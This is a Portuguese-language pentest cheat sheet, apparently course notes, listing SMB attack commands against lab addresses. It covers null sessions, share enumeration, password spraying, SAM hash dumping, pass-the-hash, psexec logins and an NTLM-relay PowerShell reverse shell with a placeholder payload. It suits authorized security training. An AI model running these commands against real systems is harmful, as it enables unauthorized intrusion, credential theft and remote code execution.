SMB
Server Message Block (SMB) é um protocolo de comunicação criado para fornecer acesso compartilhado a arquivos e impressoras entre nós em uma rede. Inicialmente, ele foi projetado para rodar em cima do NetBIOS sobre TCP/IP (NBT) usando porta TCP 139e portas UDP 137e 138.
Teste de sessão nula no serviço SMB.
smbclient -N -L //10.129.14.128Enumeração de compartilhamento de rede usando
smbmap.
smbmap -H 10.129.14.128Enumeração de compartilhamento de rede recursiva usando
smbmap.
smbmap -H 10.129.14.128 -r notesBaixe um arquivo específico da pasta compartilhada.
smbmap -H 10.129.14.128 --download "notes\note.txt"Carregue um arquivo específico para a pasta compartilhada.
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"Sessão nula com o
rpcclient.
rpcclient -U'%' 10.10.110.17Enumeração automatizada do serviço SMB usando
enum4linux-ng.
./enum4linux-ng.py 10.10.11.45 -A -CPulverização de senhas contra diferentes usuários de uma lista.
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'Conecte-se ao serviço SMB usando o
impacket-psexec.
impacket-psexec administrator:'Password123!'@10.10.110.17Execute um comando no serviço SMB usando
crackmapexec.
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexecEnumerando usuários conectados.
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-usersExtraia hashes do banco de dados SAM.
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --samUse a técnica Pass-The-Hash para autenticar no host de destino.
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FEDespeje o banco de dados SAM usando
impacket-ntlmrelayx.
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146Execute um shell reverso baseado em PowerShell usando
impacket-ntlmrelayx.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>Last updated